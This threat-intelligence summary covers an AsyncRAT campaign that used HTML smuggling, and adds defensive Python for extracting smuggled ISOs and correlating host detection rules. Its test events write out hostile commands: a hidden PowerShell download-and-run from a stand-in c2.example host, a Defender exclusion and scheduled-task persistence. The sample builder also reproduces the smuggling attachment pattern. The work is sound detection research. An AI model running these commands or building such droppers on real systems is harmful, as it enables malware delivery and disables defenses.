Morphisec describes a new AsyncRAT delivery campaign in which an HTML attachment carries a base64-encoded ISO file that is constructed in the browser and then mounted by the victim to run staged loaders. The multi-stage chain combines HTML/JavaScript decoding, reflective .NET injection, a dropper, and a final payload delivered with evasive techniques, and the samples showed low detection rates across many vendors. #AsyncRAT #MovingTargetDefense
Keypoints
- Campaign uses a phishing email with an HTML attachment to deliver AsyncRAT.
- The ISO is generated in-browser from a base64 string, not downloaded as a remote file.
- Stage 1 (the HTML attachment) decodes the embedded base64 data with a base64toblob function built on window.atob and wraps the bytes in an application/octet-stream Blob, which the browser saves as the ISO.
- Stage 2, launched from the mounted ISO, performs reflective .NET injection, establishes persistence via a Scheduled Task, and runs a dropped VBScript file.
- Stage 3 dropper (Net.vbs/Net.bat/Net.ps1) downloads and executes the next stage through a PowerShell process.
- The final AsyncRAT payload is placed inside the legitimate .NET aspnet_compiler.exe process using reflective loading and process hollowing to evade defenses.
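The Stage 1 technique above is worth being able to reproduce on the analyst side: pull the base64 literal out of a suspicious HTML attachment, decode it offline, and confirm it is an ISO 9660 image rather than letting a browser build and mount it. The following is an added example, not code from Morphisec's post. The sample attachment it scans is constructed here to have the shape the report describes (a base64 string passed to a base64toblob() helper using window.atob and an application/octet-stream Blob, then an <a download> click); the helper body, the "Receipt.iso" filename and the RECEIPT volume label are assumptions, and the fake ISO is a 17-sector buffer with only a primary volume descriptor.

```python
import base64
import binascii
import hashlib
import re

ISO_SECTOR = 2048
PVD_OFFSET = 16 * ISO_SECTOR   # ISO 9660 volume descriptors start at sector 16
ISO_MAGIC = b"CD001"           # standard identifier present in every descriptor
# Long quoted base64 runs; 256+ chars keeps short tokens such as nonces out.
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{256,}={0,2})["']""")


def build_fake_iso(volume_id: str = "RECEIPT") -> bytes:
    """Constructed stand-in for the smuggled image: 17 sectors with a primary
    volume descriptor (type 1) at sector 16. Not the campaign's file."""
    iso = bytearray(17 * ISO_SECTOR)
    iso[PVD_OFFSET] = 0x01
    iso[PVD_OFFSET + 1:PVD_OFFSET + 6] = ISO_MAGIC
    iso[PVD_OFFSET + 40:PVD_OFFSET + 72] = volume_id.encode("ascii").ljust(32)
    return bytes(iso)


def build_sample_html(payload: bytes) -> str:
    """Constructed attachment with the shape the report describes: the base64
    string goes through a base64toblob() helper (window.atob, Uint8Array,
    application/octet-stream Blob) and a synthetic <a download> click."""
    b64 = base64.b64encode(payload).decode("ascii")
    return f"""<html><body><script>
function base64toblob(b64) {{
  var bin = window.atob(b64);
  var bytes = new Uint8Array(bin.length);
  for (var i = 0; i < bin.length; i++) bytes[i] = bin.charCodeAt(i);
  return new Blob([bytes], {{type: "application/octet-stream"}});
}}
var a = document.createElement("a");
a.href = URL.createObjectURL(base64toblob("{b64}"));
a.download = "Receipt.iso";
a.click();
</script></body></html>"""


def is_iso9660(data: bytes) -> bool:
    """True when the primary volume descriptor carries the CD001 identifier."""
    return len(data) >= PVD_OFFSET + 6 and data[PVD_OFFSET + 1:PVD_OFFSET + 6] == ISO_MAGIC


def extract_smuggled_payloads(html: str) -> list:
    """Decode every long base64 literal in the attachment and describe it.
    Literals that are not valid base64 (long hex strings, JWT-like tokens)
    are skipped instead of aborting the scan."""
    smuggling_markers = {
        "uses_atob": bool(re.search(r"\batob\s*\(", html)),
        "blob_download": bool(re.search(r"new\s+Blob\s*\(", html)
                              and re.search(r"\.download\s*=", html)),
    }
    found = []
    for m in B64_LITERAL.finditer(html):
        try:
            data = base64.b64decode(m.group(1), validate=True)
        except binascii.Error:
            continue
        entry = {"size": len(data),
                 "sha256": hashlib.sha256(data).hexdigest(),
                 "is_iso": is_iso9660(data),
                 "volume_id": None,
                 **smuggling_markers}
        if entry["is_iso"]:
            entry["volume_id"] = data[PVD_OFFSET + 40:PVD_OFFSET + 72].decode("ascii", "replace").strip()
        found.append(entry)
    return found


if __name__ == "__main__":
    for hit in extract_smuggled_payloads(build_sample_html(build_fake_iso())):
        print(hit)
```

Running the module prints one record flagged is_iso with the volume label and SHA-256 of the recovered image, which can then be hashed against the IOC list or detonated in a sandbox without ever opening the HTML in a browser. The CD001 check at sector 16 is what distinguishes a smuggled ISO from the long base64 blobs that legitimate mail (inline images, fonts) also carries.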
MITRE Techniques
- [T1566.001] Phishing: Spearphishing Attachment – The campaign uses an HTML attachment in email to lure victims. “Through a simple email phishing tactic with an html attachment…”
- [T1027] Obfuscated Files or Information – The ISO is delivered as a base64 string that is decoded in-browser (the decoding step itself maps to T1140 Deobfuscate/Decode Files or Information). “…base64toblob function gets a Base64 encoded string as an input and is responsible for the decoding to ASCII by a window.atob…”
- [T1053.005] Scheduled Task/Job: Scheduled Task – Persistence via a Scheduled Task. “Creating persistence through Schedule Task”
- [T1059.005] Command and Scripting Interpreter: Visual Basic – Execution of a dropped .vbs file. “Executing a dropped .vbs file, usually at %ProgramData%”
- [T1059.001] Command and Scripting Interpreter: PowerShell – The loader uses PowerShell to download and execute the next stage. “…downloading and executing the next stage as part of a powershell process execution”
- [T1055] Process Injection – Injecting the .NET module payload in memory (dropper). “…Injecting the .NET module payload in-memory (dropper)…”
- [T1055.012] Process Hollowing – Reflective load and process hollowing. “Reflective load and process hollowing”
- [T1036] Masquerading – Final AsyncRAT payload hidden inside a legitimate process. “…hiding within the legitimate .NET aspnet_compiler.exe process”
- [T1548.002] Abuse Elevation Control Mechanism: Bypass User Account Control – UAC bypass noted as a defense-evasion step. “…UAC bypass using Disk Cleanup”
- [T1562.001] Impair Defenses: Disable or Modify Tools – Windows Defender exclusions and related suppression of user-visible alerts. “…Windows defender exclusion” and “Disable of action center notifications”
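The host-side techniques in the list above (a dropped .vbs under %ProgramData%, a PowerShell download stage, Scheduled Task persistence, a Defender exclusion, and the payload living inside aspnet_compiler.exe) are individually noisy but distinctive as a sequence. The following added example, not taken from Morphisec's report, runs simple per-stage rules over constructed Sysmon-style process-creation events and raises one alert per host when several stages fire together. The event records, field names, the schtasks and Add-MpPreference command shapes, the c2.example URL, the msbuild.exe/devenv.exe parent allow-list and the three-stage threshold are all assumptions chosen for illustration.

```python
import re
from collections import defaultdict

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ASPNET = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"

# Constructed Sysmon-style process-creation events (not telemetry from the report).
# ws01 replays the described chain; dev02 is benign noise from a build server.
EVENTS = [
    {"host": "ws01", "parent": r"C:\Windows\explorer.exe", "image": r"E:\Receipt.exe",
     "cmd": r"E:\Receipt.exe"},
    {"host": "ws01", "parent": r"E:\Receipt.exe", "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\ProgramData\Net.vbs"'},
    {"host": "ws01", "parent": r"C:\Windows\System32\wscript.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /c "C:\ProgramData\Net.bat"'},
    {"host": "ws01", "parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmd": "powershell.exe -ep bypass -w hidden -c \"IEX((New-Object Net.WebClient).DownloadString('http://c2.example/stage4'))\""},
    {"host": "ws01", "parent": PS, "image": PS,
     "cmd": 'powershell.exe -nop -c "Add-MpPreference -ExclusionPath C:\\ProgramData"'},
    {"host": "ws01", "parent": PS, "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r"schtasks /create /sc minute /mo 5 /tn Updater /tr C:\ProgramData\Net.vbs"},
    {"host": "ws01", "parent": PS, "image": ASPNET, "cmd": "aspnet_compiler.exe"},
    {"host": "dev02", "parent": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "image": ASPNET, "cmd": r"aspnet_compiler.exe -v / -p C:\src\site"},
]

DOWNLOAD = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer", re.I)
ASPNET_PARENTS_OK = {"msbuild.exe", "devenv.exe"}   # assumed allow-list; tune per estate


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rule_mounted_image(e):
    # Heuristic: a process launched by explorer.exe from a non-system drive letter,
    # which is how an executable on a user-mounted ISO appears.
    return bool(re.match(r"[D-Z]:\\", e["image"], re.I)) and image_name(e["parent"]) == "explorer.exe"


def rule_programdata_script(e):
    return image_name(e["image"]) in ("wscript.exe", "cscript.exe") and bool(
        re.search(r'\\programdata\\[^\s"]*\.vbs', e["cmd"], re.I))


def rule_powershell_download(e):
    return image_name(e["image"]) == "powershell.exe" and bool(DOWNLOAD.search(e["cmd"]))


def rule_scheduled_task(e):
    return image_name(e["image"]) == "schtasks.exe" and bool(re.search(r"/create\b", e["cmd"], re.I))


def rule_defender_exclusion(e):
    return image_name(e["image"]) == "powershell.exe" and bool(
        re.search(r"Add-MpPreference\b.*-Exclusion", e["cmd"], re.I))


def rule_aspnet_compiler_parent(e):
    # aspnet_compiler.exe is a legitimate .NET binary; what is abnormal is who starts it.
    return image_name(e["image"]) == "aspnet_compiler.exe" and image_name(e["parent"]) not in ASPNET_PARENTS_OK


RULES = {f.__name__[len("rule_"):]: f for f in (
    rule_mounted_image, rule_programdata_script, rule_powershell_download,
    rule_scheduled_task, rule_defender_exclusion, rule_aspnet_compiler_parent)}


def evaluate(events):
    """Map host -> set of stage names whose rule matched at least one event."""
    hits = defaultdict(set)
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                hits[e["host"]].add(name)
    return dict(hits)


def chain_alerts(events, min_stages=3):
    """Hosts where at least min_stages distinct stages fired (assumed threshold)."""
    return {h: sorted(s) for h, s in evaluate(events).items() if len(s) >= min_stages}


if __name__ == "__main__":
    for host, stages in chain_alerts(EVENTS).items():
        print(f"{host}: AsyncRAT-like delivery chain -> {', '.join(stages)}")
```

Correlating on distinct stages per host rather than alerting on each rule is the point: the Scheduled Task and PowerShell rules alone would fire constantly in most environments, while the combination with a %ProgramData% VBScript and an unexpected aspnet_compiler.exe parent is specific to this kind of loader chain. The developer build on dev02 shows why the aspnet_compiler.exe rule keys on the parent process and not on the binary itself.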
Indicators of Compromise
- [HTML] HTML attachment filenames – Receipt-<digits>.html naming pattern (e.g. Receipt-123.html, Receipt-456.html)
- [Hash] HTML delivery hashes (SHA-256) – fa5f4847181550f1332f943882bc89ab48302a3d6d6efc1a364b2af7dec119b2, 50d308118008908832fe9c7fa78169ef8aaa960450c788a2c41af0eb5e0a62db
- [Hash] AsyncRAT component hashes (SHA-256) – 58bee75d7a00ca8d8c0e9fbbc8ada035b82de90cbacf63f1ac7e1db0e771aa28, b49f3b8aae24c6ae2026e86a1d12f2487dd768c1326bfc7e3bb610db7a0e857b
- [Domain] C2 host:port pairs – pop11.ddns[.]net:6666, wthcv.sytes[.]net:7400
- [Hash] Email-related artifacts (SHA-256) – 1241b9486d3d7c74c0bb1f2a7bdd81ff9597b2c92f2af8a5b3819b296c400336, d67bd08e03a5e2054aae8458b0c549cec2f988a9e703d3ed755626d840990a0e
Read more: https://blog.morphisec.com/asyncrat-new-delivery-technique-new-threat-campaign